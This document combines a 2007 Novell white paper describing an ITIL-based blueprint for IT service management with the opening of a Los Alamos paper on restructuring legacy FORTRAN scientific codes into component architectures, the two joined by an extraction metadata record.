IT infrastructure and its applications. Applications are discovered by matching discovered artifacts with defined application attributes including file locations, registry settings and service signatures—a process called application fingerprinting. Relate Once all the resources have been identified, it is equally important to know how they interact with each other in terms of dependencies and capacity and bandwidth requirements. With the introduction of virtualization this issue becomes more acute. VMs require physical devices they can run on, “pinning” information such as IP addresses and storage location and control of the lifecycle itself. These relationships are captured in a “model” and stored in databases. The model must build in permanent relation facilities for discovered resources. We are suggesting that the systems management blueprint have an evolving model of relationships, and that this be accomplished through a federated CMDB (FCMDB). A CMDB is a database that contains all the details about employees, workstations, devices, incidents, problems and changes as well as complete details of all the components in the business. It provides the basis for a public knowledgebase of known errors and solutions, which helps employees resolve minor incidents themselves without contacting the helpdesk. It also provides a private knowledgebase where the support staff can get detailed reports about all assets, with problem histories, workarounds and temporary fixes included. 
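To make the difference between such a CMDB and a flat asset register concrete, the following sketch (in C#, purely illustrative; the class and field names are assumptions rather than any product's actual schema) models Configuration Items with navigable relationships and answers a simple "what would be affected if this CI failed?" question by walking those links.

```csharp
// Illustrative CMDB model only; the class and relationship names are
// assumptions for this sketch, not any vendor's actual schema.
using System;
using System.Collections.Generic;

class ConfigurationItem
{
    public string Id;     // e.g. "server-042", "sap-erp"
    public string Type;   // e.g. "Server", "Application", "Service"
    public List<ConfigurationItem> DependsOn = new List<ConfigurationItem>();
    public List<ConfigurationItem> Dependents = new List<ConfigurationItem>();

    public void AddDependency(ConfigurationItem provider)
    {
        DependsOn.Add(provider);
        provider.Dependents.Add(this);   // keep the relationship navigable in both directions
    }
}

static class ImpactAnalysis
{
    // "What if this CI failed?" -- collect everything that directly or
    // indirectly depends on it by following the relationship links.
    public static ISet<string> AffectedBy(ConfigurationItem failed)
    {
        var affected = new HashSet<string>();
        var queue = new Queue<ConfigurationItem>(failed.Dependents);
        while (queue.Count > 0)
        {
            var ci = queue.Dequeue();
            if (affected.Add(ci.Id))
                foreach (var dependent in ci.Dependents) queue.Enqueue(dependent);
        }
        return affected;
    }
}
```

In a federated CMDB the same traversal would cross CIs owned by different source systems, which is one reason stable, persistent identifiers for every CI matter.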
As mentioned earlier, within this context, components of an information system are referred to as CIs. The processes of Configuration Management seek to specify, control and track CIs and any changes made to them in a comprehensive and systematic fashion. We suggest that the federated model, where many systems can be originators (and maintainers) of CIs, is much more practical for any but the smallest of organizations. This approach avoids the biggest pitfall of early ITIL implementations—the creation and maintenance of the universal CMDB. The federated approach allows the individual systems to continue as they always have, while also cooperating in a "virtual" CMDB that has access to CIs and their relationships. The Discovery processes will populate the CMDB with CIs according to the evolving models. Outside systems such as human resources systems will also create CIs. For example, a typical policy would be "all employees and contractors can only be created by PeopleSoft." The FCMDB will appear as a single database to the higher layers of the model without the pitfalls of actually creating a single, enormous, centralized, duplicative database.

**Contain and Instantiate**

In the new service-oriented world, virtualization is critical. However, with virtualization comes a new set of management challenges. The introduction of virtual machine operating system "images" as a first-class IT asset necessitates OS image lifecycle management—for instantiation, usage and retirement. Additionally, cloning new OS images from templates, as opposed to creating and deploying new images, is also required. Cloning is optimal for transient workloads, compared to OS images that are version controlled as part of a change-control strategy. OS images must be managed, leaving IT to ask key questions: "How do I control who defines and creates an OS image?", "What is the process for rolling out to production?" and "How do I manage change for virtual machines?"

A second challenge is that once multiple virtual machines have been deployed to a physical server, multiple applications and business systems are critically affected in the event of a server failure. It is no longer enough to just replace a downed server and suffer a short application outage. The blueprint describes clustered virtual machine servers for hosting services in virtual machines—with rapid redeployment of services should a physical server fail.

Today, businesses have to define "blackout" periods, the windows of time that IT "owns" in order to patch or update systems to better secure them or to support new application features. These blackout periods mean that some or all of the business must come to a halt for the blackout period. In our global economy, where business runs 24x7, this may cost a company millions in revenue. The business needs a way to assign priority between the update and the needs of the business. The ability to dynamically allocate resources through pre-emption or starving can offer the business the best case for maintaining the balance between business process and systems maintenance.

The IT Service Management Forum (itSMF) has published Software Asset Management processes that concentrate on the specific demands of managing an organization's software assets and all issues related to asset use. Software Asset Management comprises three processes: Core Asset Management, Logistics and Relationships.
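As a concrete illustration of the image lifecycle questions raised above, here is a small C# sketch that distinguishes templates (which are cloned before use) from deployable images and records who created each image and what state it is in. The states, fields and rules are assumptions made purely for illustration; the DMTF work discussed below defines the authoritative lifecycle model.

```csharp
// Illustrative sketch of OS image lifecycle tracking; the states and
// fields are assumptions, not the DMTF SVPC model itself.
using System;

enum ImageKind { Template, Deployable }
enum ImageState { Defined, Approved, Staged, Deployed, Retired }

class OsImage
{
    public string Name;
    public ImageKind Kind;
    public ImageState State = ImageState.Defined;
    public string CreatedBy;
    public DateTime CreatedAt = DateTime.UtcNow;

    // Templates are never deployed directly; they are cloned first,
    // which is the pattern suggested above for transient workloads.
    public OsImage Clone(string newName, string requestedBy)
    {
        if (Kind != ImageKind.Template)
            throw new InvalidOperationException("Only templates can be cloned.");
        return new OsImage { Name = newName, Kind = ImageKind.Deployable,
                             State = ImageState.Staged, CreatedBy = requestedBy };
    }

    public void Deploy()
    {
        if (Kind != ImageKind.Deployable || State != ImageState.Staged)
            throw new InvalidOperationException("Image must be a staged, deployable image.");
        State = ImageState.Deployed;
    }

    public void Retire() => State = ImageState.Retired;
}
```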
Core Asset Management Processes Core Asset Management processes identify software assets, maintain information about them throughout their lifecycles and manage physical assets related to software. With the advent of virtualization, lifecycle control becomes far more complex. In the asset model of the past, IT was challenged with recording asset “tags” for physical devices and tracking their whereabouts until they were fully depreciated and retired. Software was tracked by version and license count, and retired mostly by an upgrade. In today’s virtualized environment, IT needs to know where an image comes from, why it was created, what state it is in, how to store it and make it available for use, and who can use it, for how long and when. The Contain and Instantiate blocks address these issues by combining new image-creation services with proposed standards for describing the lifecycle of the image-creation process. **Logistic Processes** The management data that describes the creation portion of the lifecycle covers only a portion of the VM lifecycle. Once the OS image has been created, it is necessary to store and “stage” the image for use. The storage process requires similar data collection: where is the image stored, who stored it there, and when, and how it is to be used? There are two types of OS images at this point: templates and deployable images. Templates are “gold master” images that are copied (cloned), and then deployed. Deployable images are directly moved to the target resource where they are run. The Systems Virtualization, Partitioning and Cluster (SVPC) Working Group at the DMTF has defined a management model that describes these stages of VM lifecycle management. The blueprint uses this proposed standard to ensure consistent lifecycle management for all VMs, regardless of their vendors. **Relationship Processes** Relationship processes manage all relationships within the business and with partners and suppliers, according to agreed-upon contractual, legal and documented service terms and targets relating to software use. The blueprint addresses service terms and licensing compliance. Tools like Novell ZENworks® Asset Management provide both license checking and reporting. Policies govern the use of software and can be configured to provide alerts or restrict usage when one is out of compliance with licensing terms. **Manage** The fundamental core of the entire system are the individual “spokes,” the ITIL functional processes required—all or in part—to manage any sizeable IT organization. For our purposes, we will separate them into two categories: first, Service Management, which consists of both Service Delivery and Service Support, and second, Application Management. **Service Delivery and Service Support** The Service Management components of ITIL, as we stated earlier, deal more with the day-to-day support and maintenance processes of Service Support and Service Delivery. In this category, we also place IT Provisioning for both physical and virtual environments, self-service, storage management and license management. All of these processes create and/or deploy identities and CIs, and make changes to them according to policy. These processes can also accommodate human intervention, of course, as automated management policies cannot cover all contingencies. 
A combination of two or three different systems are normally engaged to enable these tasks, and depending on the number of platforms supported, potentially several more: configuration and storage management systems are closely tied to particular platforms because small details can greatly improve the usefulness of a particular product. We expect that in the near future, standards maturation will allow for single systems to manage resources ranging from personal devices to the data center; specialized large systems will be brought along later. Of course, the commercially available systems will cross over the theoretical lines drawn by ITIL. Provisioning, for example, is accomplished in change-, configuration-, storage- and identity-management software. The single-product process paradigm is becoming rarer, and even then, interoperability will be a basic requirement. **Applications Management** A key issue that has existed for some time is the problem of moving application developers and IT service management closer together. Service-management considerations within all phases of the application lifecycle have been seriously deficient. Applications need to be deployed with service-management requirements included: that is, they need to be designed and built for operability, availability, reliability, maintainability, performance and manageability. Moreover, they should be tested for compliance to specifications. **Application Development** is concerned with the activities needed to plan, design and build an application that can ultimately be used by some part of the organization to address a business requirement. The blueprint introduces the notion of a creation service for images. This service will contain management data about the build process but will not address the need to “instrument” applications for better service management. IT cannot guarantee the absence of problems in a production environment, so it must have established remediation procedures to discover problems, alert remediation systems and actually fix the problems. These systems are usually a combination of automation and human intervention. Some issues, like disaster failover, can be fully automated; others, like diagnosing a particularly tricky application problem, are almost entirely staff-centric. But most problems require a combination of automation and human intervention, if only to discover the problem in the first place. This is also an area in which a pervasive identity security and management fabric can enable substantial evolution: as assets and individuals are persistently recognized, many problems will disappear, including authorization issues (passwords) and security violations. As these problems are resolved, the IT staff will have more time to discover and diagnose difficult problems. **Orchestration** The next challenge on the horizon is automating resources. CIOs are faced with the mandate to “do more with less.” To meet this objective, they resort to draconian cuts in the numbers or types of devices supported and in the people that maintain those resources. Simple “trusted” tasks are left to the management software to fix, or a failing device is replaced with another “hot spare.” Several management tools are trying to address these issues by introducing workflows or best practice policies that CIOs can trust and a smaller IT staff can easily use. The panacea for management is to not have to know about it at all. 
The notion here is that one can define the business need in either policy or workflow—or perhaps in plain language—and the management system will simply figure out what resources need to be deployed when and where. Although this point has not been reached, given virtualization, such a system may be realized in the not-too-distant future.

The Orchestration block introduces the notion of workloads. A workload is a task that the business process requires to meet the objectives of the business. Within this block, we look at all the compute resources as the total compute power in the enterprise, both desktops and servers. When a workload is desired, it is deployed to the best location, either physical or virtual, in which it can be run. The orchestrator allocates or reserves compute resources for the workload. For example, there are times when the business needs to prioritize work to meet certain business objectives. At these times the orchestrator can preempt other workloads or move them to allow the higher-priority workload to execute. Should all the compute resources be busy at the time when the higher-priority workload is needed, the orchestrator can starve another workload by taking its resources and later giving them back. This orchestration allows the organization to do what it does best, while understanding the service-level expectations of both the business and IT. Or in other words, it keeps the business moving!

**Visualize**

Finally, there is the notion that one console can do it all. In reality, there are three kinds of needs for which consoles may be developed. The dashboard view is targeted at the CIO who wants to know the overall state of the system. This management dashboard provides either color-coded event strings or color-coded images that represent servers or applications. In the operator's console, on the other hand, workflows can be launched, a VM deployed or some other "operation" or remediation performed to keep the system up and running according to the Service Level Agreement (SLA). Finally, there is the developer's console, which allows policies to be written, and VMs and workflows to be defined. Any or all of these consoles may be graphical user interfaces (GUIs), command-line interpreters or Web pages. In most cases, they are a combination of all three. The CIO gets a simple overall view from a business perspective, while the IT personnel have to decide which console to use, and when.

**Monitor**

In the area of resource monitoring there are already many ways to observe information about common resources. In fact, many resource providers support several of the current standard application programming interfaces (APIs) in an effort to publish information to the widest audience possible. However, there is a constant tradeoff in performance and other factors when providing all the data to anyone requesting it. This has led to support for standardized, purpose-driven APIs that try to focus the amount of data being requested. However, although these APIs have often been agreed upon and implemented, the data made available is not always consistent. The units of measure as well as the meaning of the terms are critical. For example, is "available memory" of 2000 a measure of megabytes of RAM or gigabytes of disk space? Historically, each data consumer leveraged some mechanism—often a local agent—that managed its access to the resource through a published API.
These agents were in conflict with each other, causing customers to pick specific vendor solutions that implicitly excluded others. Because use of the data varied, and vendors typically did not cover every use case, end users encountered significant problems. The users were also left with the cost of ownership and administration of these agents, as they had to mix and match agents depending on the tools they wanted to use. End users are now demanding agentless environments, in which the managed environment itself provides native collection systems.

The price to be paid for increased automation is that we have to monitor the system and bring exceptions to light for remediation on a nearly instantaneous basis. We must continually monitor servers, OSes, applications and services to make sure SLAs are met and that the policies established do not result in over-allocation of capacity, power or storage. We must also be aware that systems break and that business processes may be poorly defined, allowing automation to run in ways that we might not anticipate. Monitoring (with control and remediation capabilities) is critical to keep the system from producing unwanted results.

**Security and Identity**

IT Security Management is the process of managing a defined level of security for information, IT services and infrastructure. IT Security Management ensures that:

- Security controls are implemented and maintained to address changing circumstances such as changed business and IT service requirements, IT architecture elements, threats and so forth.
- Audit results show the adequacy of security controls and measures taken.
- Reports are produced to show the status of information security.

Under ITIL, the functions that we think of as "security" are separated into several processes. Identity management, security event management and patch management are part of security in most people's minds, but these are separate processes under ITIL. The Security Management process involves taking standard policies and enforcing them in real time.

The core of our vision rests on an identity fabric that is woven throughout the entire model. All of the participants—employees, managers, customers, partners, devices and locations—must be identified and have roles assigned in order for policies to be effective. The only way to reconcile multiple discoveries on the same devices is to have a permanent identity that persists throughout the lifecycle of the entity. For example, we may have a desktop machine that has certain components in a central database, including a biometric authorization component (fingerprint reader). When the CFO signs onto this machine, we want to check that the machine is authorized and is configured according to policy: it would be OK for a new application to be added (as long as it's not a keystroke scanner!), for example, but not for the fingerprint reader to disappear. We need persistent identity of the machine, user and important components to reconcile ongoing discovery for our policy engine to make accurate decisions.

The Bandit project, [http://www.bandit-project.org](http://www.bandit-project.org), is a set of loosely coupled components that provides consistent identity services for authentication, authorization and auditing. Bandit implements open standard protocols and specifications such that identity services can be constructed, accessed and integrated from multiple identity sources. Bandit components support many authentication methods and provide user-centric credential management.
And Bandit is building additional services needed for Role-Based Access Control (RBAC) and for the emission of records to verify compliance with higher-level policies. One area where we are currently extending identity is in the realm of VMs. Not only will we identify potential VMs in a repository, but we will also be able to identify and track instantiated VMs in the production environment—as well as the applications running under them—for license and usage analysis.

**Audit and Compliance**

All IT systems, but especially those that touch customer records, financials and other strategic corporate data, must be auditable. Today's standards for IT audits require a compliance monitoring system. These systems are constantly testing events to see if any activity violates corporate IT policies, whether those relate to outside regulations or simply are internal IT governance choices. Auditors do not prescribe how companies should comply, but they do insist on compliance processes. The blueprint must have compliance built in, and it must pervade all elements to succeed.

**A New Model of Computing**

The classic computer has CPUs, memory and disks to hold data when the power is turned off. Virtual memory gave computers the ability to present to applications the illusion of more main memory than was physically available. Virtual disks create the illusion of a larger or more fault-tolerant disk compared to the many physical disks they comprise. VMs present the illusion of a whole computer that is actually contained by a real computer sharing its physical resources among competing virtual machines. Clusters present the illusion of a single reliable computer by coupling together physical computers and masking their failures. Virtualization eliminates physically imposed static boundaries: CPU, memory and disks are allocated dynamically. Services and data gain mobility: the freedom to optimally consume physical resources and the ability to rapidly switch to alternate physical resources while adapting to workload demands. High availability is a natural consequence of virtualized systems.

Today, data center computers (servers) are connected to disks over a storage area network (SAN). By removing and relocating storage from individual servers to a central network location, server form factors have shrunk; blade servers are now popular. Blades are granted access to virtual disks (named storage containers) located inside SAN disk arrays. When a server fails, processing fails over to another server with access to the same SAN virtual disks. When a service (running on a server) runs out of storage, more space can be allocated from the SAN, using standard management APIs. When services themselves are virtualized, by hosting them inside a VM, they gain the flexibility to migrate from one physical server to another.

Legacy line-of-business (LOB) applications are also being virtualized. Static, monolithic client/server software is being augmented or replaced with Web services. Web-based Service-Oriented Architecture (SOA) replaces earlier distributed object systems. There are new WS-* protocols for anything that wasn't XML-based before. And LOB applications now comprise a number of cooperating services. Infrastructure services provide naming, discovery, and, via XML, a data integration and exchange format. LOB components execute in VMs and communicate using Web services protocols. SOA and WS-* protocols are creating a new platform for distributed computing.
Finally, with so many distributed moving parts, identity management creates the infrastructure necessary to securely name and associate, authenticate and authorize service consumers with producers regardless of service type. Identity is the context that binds a flow of service requests all the way from the end user through multiple processing tiers to data on disks. Users are granted rights to services, and services are granted rights to other services. And if we haven't experienced enough virtualization yet, identity itself has been virtualized by the notion of "role." The blueprint, based on ITIL, embraces this new model of computing and turns the CIO's dream of service on demand as part of business solutions into a reality.

**Appendix—Open Standards and Open Source**

IPMI, SMASH, SMI-S, and SVPC-V are all DMTF CIM-based management profiles that describe models and APIs for server, storage and virtualization management. WS-Management provides Web-services-based access to these and other existing management profiles, via translation of model objects and relationships into XML schema and SOAP for transport-level interoperability.

**Bandit**

Bandit implements open standard protocols and specifications such that identity services can be constructed, accessed and integrated from multiple identity sources. Bandit components support many authentication methods and provide user-centric credential management. On this base of a common identity model, Bandit is building additional services needed for Role-Based Access Control (RBAC) and for the emission of records to verify compliance with higher-level policies. Since every IT resource has an identity, Bandit's implementation of open access control will provide the foundation for trust when managing virtual resources and their relationships.

**Common Information Model (CIM)**

A normative definition (and model) of management information for systems, networks, applications and services. CIM enables systems and management application vendors to exchange and act on semantically rich management information (www.dmtf.org).

**Systems Management Architecture for Server Hardware (SMASH)**

Novell was a founding member of the Open Management with CIM project, which promotes an open source implementation of SMASH and related profiles (www.omc-project.org).

**Storage Area Network (SAN)**

A storage-specific network that connects multiple servers to centralized storage subsystems. Fibre Channel and iSCSI are common technologies for creating a SAN. SUSE® Linux Enterprise 10 includes the latest open source support for iSCSI and the Virtual N_Ports necessary for virtual machine mobility on Fibre Channel networks. Novell is also working to instrument storage components as described by SMI-S.

**Storage Management Initiative Specification (SMI-S)**

An ANSI standard for managing storage (network) devices (www.snia.org/smi). Novell is a member of SNIA and participates in both the SMI-Lab and the Aperi open source SMI-S platform project (www.eclipse.org/aperi).

**Virtual Machine Monitor (VMM)**

Support for a number of execution environments on a single computer, each of which emulates the host computer. This provides services with the illusion of owning an entire computer, but one that is a "private" machine, isolated from others, sharing a single physical machine. The software that provides this capability is called a virtual machine monitor or hypervisor.
Novell is working with the open source Xen hypervisor project and, via the DMTF System Virtualization, Partitioning and Cluster working group, is helping to define an interoperable standard for virtual machine lifecycle management. For more information about this collaboration, visit: http://wiki.xensource.com/xenwiki/XenCim

**Web-Based Enterprise Management (WBEM)**

A set of standards developed to unify the management of distributed computing environments. WBEM provides the foundation for the industry to deliver well-integrated standards-based management tools, facilitating the exchange of data across otherwise disparate technologies and platforms ([www.dmtf.org/standards/wbem/](http://www.dmtf.org/standards/wbem/)).

**WS-Management**

WS-Management addresses the cost and complexity of IT management by providing a common way for systems to access and exchange management information across the entire IT infrastructure. By using Web services to manage IT systems, deployments that support WS-Management enable IT managers to remotely access devices on their networks. Novell is working with the [www.Openwsman.org](http://www.Openwsman.org) project with the goal of providing a complete WS-Management stack, using CIM to supply the system management information. The main focus is to support mapping CIM data into WS-Management and to reuse existing agents (providers) currently available.

© 2007 Novell, Inc. All rights reserved. Novell, the Novell logo, the N logo, ZENworks and SUSE are registered trademarks of Novell, Inc. in the United States and other countries. *Linux is a registered trademark of Linus Torvalds. All other third-party trademarks are the property of their respective owners.*

© Copyright itSMF, 2004
{"Source-Url": "https://www.netiq.com/docrep/documents/87ee2bxb17/A_Management%20Blueprint_WP_Final_03-07-07_en.pdf", "len_cl100k_base": 7947, "olmocr-version": "0.1.53", "pdf-total-pages": 17, "total-fallback-pages": 0, "total-input-tokens": 32391, "total-output-tokens": 8678, "length": "2e12", "weborganizer": {"__label__adult": 0.0003981590270996094, "__label__art_design": 0.0009307861328125, "__label__crime_law": 0.0007762908935546875, "__label__education_jobs": 0.0036258697509765625, "__label__entertainment": 0.00021982192993164065, "__label__fashion_beauty": 0.0002312660217285156, "__label__finance_business": 0.0230255126953125, "__label__food_dining": 0.0003325939178466797, "__label__games": 0.0008935928344726562, "__label__hardware": 0.006351470947265625, "__label__health": 0.0009355545043945312, "__label__history": 0.0005168914794921875, "__label__home_hobbies": 0.0003418922424316406, "__label__industrial": 0.0019397735595703125, "__label__literature": 0.00033092498779296875, "__label__politics": 0.0003437995910644531, "__label__religion": 0.0004341602325439453, "__label__science_tech": 0.31103515625, "__label__social_life": 0.0001575946807861328, "__label__software": 0.29345703125, "__label__software_dev": 0.3525390625, "__label__sports_fitness": 0.00023245811462402344, "__label__transportation": 0.0006914138793945312, "__label__travel": 0.0003561973571777344}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 43185, 0.00507]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 43185, 0.1743]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 43185, 0.93578]], "google_gemma-3-12b-it_contains_pii": [[0, 82, false], [82, 766, null], [766, 4332, null], [4332, 6553, null], [6553, 8213, null], [8213, 11366, null], [11366, 13343, null], [13343, 14858, null], [14858, 18477, null], [18477, 21667, null], [21667, 24967, null], [24967, 28806, null], [28806, 32361, null], [32361, 35980, null], [35980, 38774, null], [38774, 41771, null], [41771, 43185, null]], "google_gemma-3-12b-it_is_public_document": [[0, 82, true], [82, 766, null], [766, 4332, null], [4332, 6553, null], [6553, 8213, null], [8213, 11366, null], [11366, 13343, null], [13343, 14858, null], [14858, 18477, null], [18477, 21667, null], [21667, 24967, null], [24967, 28806, null], [28806, 32361, null], [32361, 35980, null], [35980, 38774, null], [38774, 41771, null], [41771, 43185, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 43185, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 43185, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 43185, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 43185, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 43185, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 43185, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 43185, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 43185, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 43185, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 43185, null]], "pdf_page_numbers": [[0, 82, 1], [82, 766, 2], [766, 4332, 3], [4332, 6553, 4], [6553, 8213, 5], [8213, 11366, 6], [11366, 13343, 7], [13343, 
14858, 8], [14858, 18477, 9], [18477, 21667, 10], [21667, 24967, 11], [24967, 28806, 12], [28806, 32361, 13], [32361, 35980, 14], [35980, 38774, 15], [38774, 41771, 16], [41771, 43185, 17]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 43185, 0.0]]}
olmocr_science_pdfs
2024-12-09
2024-12-09
dc0a3a020c3e2d397367d9ba940598d0079dceba
**A Face-Lift for Aging FORTRAN Scientific Applications**

Teri Roberts and Skip Egdorf

**Abstract**

Los Alamos National Laboratory has a rich legacy of physics-based modeling codes that date back to the Manhattan Project in the 1940s. As some of these codes have made the transition from the early weapons context in which they were first developed to a broader, industrial design and modeling context, they have retained constraints imposed by the limited structure of those early computing environments. These physics modeling codes represent decades of research and development. Advancement of the physics modeling in these codes has outpaced adoption of advances in computing technology. The availability of newer technologies such as parallel computing, distributed web applications, and advanced design paradigms compels evolution of these codes. As these codes evolve, their inherent value must be preserved and placed within the reach of a broader scientific audience.

**Constraints of Early Computing Environments**

Compared to today's standards, early computing systems were slow, expensive and required large amounts of physical space. Economical use of precious resources dictated the programming practices of the day. Optimizations at a micro level were extremely important and common. Typical coding styles were very terse. For example, all variables local to a routine might be no more than two characters in length and all COMMON variables might be limited to three to six characters in length. Common program structures were limited to arrays. Massive use of EQUIVALENCE statements and offset indexing were often used to handle dynamic memory limits and variable array sizes. Comments were sparse.

The concept of dynamic linking did not exist until introduced by Multics in the late 1960s and did not become common until its implementation in Windows and UNIX appeared in the late 1980s. Consequently, the common construction mechanism used to build executable programs was static linking of all code references into one monolithic image. Overlay mechanisms allowed these monolithic programs to run on severely limited memory resources. Integrating related programs was a challenge. Magnetic tapes or disk files were typically used as the basis for integration. Initial inputs were often limited to a card-image model of data. New capabilities were often added without full consideration of how the collection formed a coherent product. These constraints lead to a structure that is hard to approach except by individuals who are capable of grasping both the software structure inherent in the monolithic code and the physics concepts being modeled by the code. Such individuals are rare.

**Encouraging Removal of Constraints**

Today's computers are faster, resources such as disk and memory are cheaper, and far less physical space is required than when these codes were first developed. It is possible to construct massively parallel machines by harnessing a set of relatively inexpensive workstations or personal computers. Human resources with appropriate scientific computing knowledge and skill are far more expensive than computing platforms. Optimizations at a macro level and improved interactions between program modules have become more important than maximizing resource use at a micro level. An architectural solution is needed that supports this different philosophy.
The size of the monolithic structure embodied in many scientific programs has reached a scale where very few scientists have an overall view of the parts as a whole. The development community for these codes is thus very small. To achieve an architecture that is approachable by a larger development community, we must create a cohesive set of smaller, modular components that can be composed to achieve the same effect as the huge monolithic program.

**Terminology**

In the subsequent discussion of both existing and suggested approaches, we will use three key terms.

1. **Objects**

Objects are the fundamental unit of software design and implementation. Objects are used when software engineers model individual entities within a single program. A distinction is drawn between object-based design and implementation models and object-oriented design and implementation models. Object-based design and implementation techniques typically require only that the program design or implementation be structured out of entities that encapsulate processing and storage for each entity. Object-oriented design and implementation techniques typically add inheritance, polymorphism, and various other structuring facilities onto the object-based system.

Organizing scientific codes as a set of objects may be done either as a new development or as a re-design of an existing legacy code. For the purposes of component architectures, it is sufficient that the software design have the characteristics of encapsulation and isolation of entities so that these objects may be grouped into modules. It is often the case that existing codes break these requirements, as they may have been designed years before current technology existed, and may have been in continual use and modification since. The process of modular decomposition of these codes is primarily the application of these object-based encapsulation requirements to the existing codes to produce objects sufficient for grouping into modules. Our requirements for an object in software design and implementation are simpler than those of a full object-oriented design; we require no inheritance, polymorphism, or any of the other capabilities currently in vogue for objects.

From the point of view of component architectures, the type of analysis, design, and programming technologies used for individual programs is simply not a concern. The main reason for discussing objects here is to note that the common terms dealing with object-oriented analysis, design, and programming, and all the lifecycle tools and technologies built around these concepts, do not affect our discussions of component architectures. This is not to discourage the use of such technology, as it will certainly aid the construction of correct codes at the single-program level and may simplify the migration of classic monolithic architectures to the modular architectures needed to build components.

2. **Modules**

Modules are the fundamental unit of software distribution. Modules are used when describing the structure of individual programs or program libraries. Modules are groupings of freely interacting objects that are self-contained and bounded. Interactions with objects in other modules are allowed only through well-defined interfaces. To other objects, a module is a black box whose only visible effects are those provided by the well-defined interfaces of the module. Modules are self-contained when they communicate with other modules only through these interfaces.
Modules are bounded when objects outside the module interact with the objects inside the module only via the defined interface. A great deal of work is underway to modernize old scientific codes or produce new scientific codes at this level. Common techniques at this level include converting existing programs or writing new programs that use FORTRAN 90/95 modules or that use C++ class libraries.

3. **Components**

Components are the fundamental unit of software marketing and commerce. Components are used when describing different organizations cooperating to produce specialized software capabilities that inter-operate across different individual programs. Components are groupings of modules with two additional constraints. First, the well-defined interface for the modules that compose the component is defined and enforced by computer tools. This means an Interface Definition Language (IDL), which is processed to automatically enforce modular containment and bounding, formally defines the interface. Second, a mechanism is added to allow control and discovery of the modules that make up the component and to control access to the modules within the component. This may be as simplistic as the system's mechanism for finding and linking dynamic libraries, or as complex as a network-interconnected request broker system.

**Existing Approaches**

Both the object and module approaches described above have been used with varying degrees of success to modernize the scientific codes that reside in the Laboratory.

**Language Issues**

One approach to the modernization problem is to rewrite the applications in newer languages such as C or C++ and newer FORTRAN versions such as FORTRAN 95. This language rewrite approach introduces integration problems when two or more modeling capabilities implemented in different languages must be coordinated to work together. We need solutions that go beyond a simple language upgrade. The various developers of the codes will never agree upon a single language. We are aware of several examples of this language issue. They include two variants of one code that are both moving from FORTRAN 77 to FORTRAN 90, one code written entirely in C++, one code written in FORTRAN 90 with a C++ main routine that is moving toward more C++, one FORTRAN 90 code with a C++ simulation module, and one code written in a hand-crafted object-oriented FORTRAN. Clearly, any attempt at integration of such disparate codes would have to go beyond a language-based solution.

**Complexity Issues**

A natural tendency, given expanded computer resources, is to add more complex data structures and functionality to the existing codes to support broader design and modeling contexts. Problems arise when the low level of abstraction (global variables and shared common data) present in many of the legacy codes introduces difficulties in identifying interfaces and integration points. Examples of this complexity expansion include programs whose structure still reflects the set of overlays from memory-starved machines and programs that are the merger of two or more early programs that communicated with tapes and disk files. We need solutions that transcend the monolithic structure present in these codes. A limit has been reached in the size and complexity of these structures.

**Suggested Approaches**

In addition to the object and module level approaches in use, an architecture that supports the expansion of the community of users and developers is needed. This is an important characteristic of a component architecture.
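To keep the discussion that follows concrete, the sketch below illustrates roughly what such a tool-enforced component interface might look like in CORBA IDL. All of the module, type, and operation names here are our own illustrative assumptions; they are not taken from any existing Laboratory code.

```idl
// Illustrative sketch only; every name here is hypothetical.
module MaterialData {
  // A material specification of the kind used by physics modeling codes.
  struct Material {
    long   atomic_number;
    long   atomic_mass;
    string library_id;
    string data_class;
    double atom_fraction;
  };

  // The only path by which other modules may reach material data.
  // An IDL compiler generates stub and skeleton code from this
  // definition, mechanically enforcing the containment and bounding
  // described above.
  interface MaterialCatalog {
    Material lookup(in long material_number);
    void     add(in long material_number, in Material m);
  };
};
```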
**Object-oriented Techniques Alone Are Not Enough**

While object-oriented analysis, design, and programming techniques are widely accepted by the computing community as an efficient and robust method for software construction, the resulting individual programs are not sufficient by themselves to support the needs of a computing community. The ability of the community to extend old software and develop new software is constrained largely by the amount of reuse of existing objects that can be obtained and by how well existing programs can coexist and cooperate. By themselves, the techniques of object-oriented programming are of little help for this larger problem.

**Modules Alone Are Not Sufficient**

Modules represent a higher-level approach than objects. Typical module implementations include subroutine libraries and class libraries. These libraries are common on most current computing platforms. However, the discovery and dissemination of the module content is limited to user documentation and ad hoc browsing tools. Consequently, there is little or no enforcement of the use of the interfaces contained within the modules. This limits the ability to dynamically discover and reuse the module content in a way that enforces consistent and correct use. Modules of executable code are sufficient for delivery of an interacting set of objects but, by themselves, do not contribute to the dissemination of the interfaces provided by the modules.

**Moving to a Component Architecture**

Components add two things to module libraries. The definition and enforcement of module interfaces using IDL specifications and IDL compilers forms the basis for correct dissemination and use of module content. Using request broker facilities contributes to the discovery and delivery of the module contents. Once software is structured as components, the modules that make up the components can be treated as commodity items that are purchased or traded and reused. This is possible because the two conditions of well-defined interfaces and run-time control of module discovery combine to allow implementation details to be hidden behind interface definitions and request broker facilities. Our motivation for moving to component architectures is to allow for the development and evolution of communities that can share and co-develop the software components in a way that allows an economy to emerge. These communities can be based around various economic models ranging from free trade to strict commercialization. We are not suggesting that communities cannot form around module libraries. Examples of such communities can be found, but with limitations.

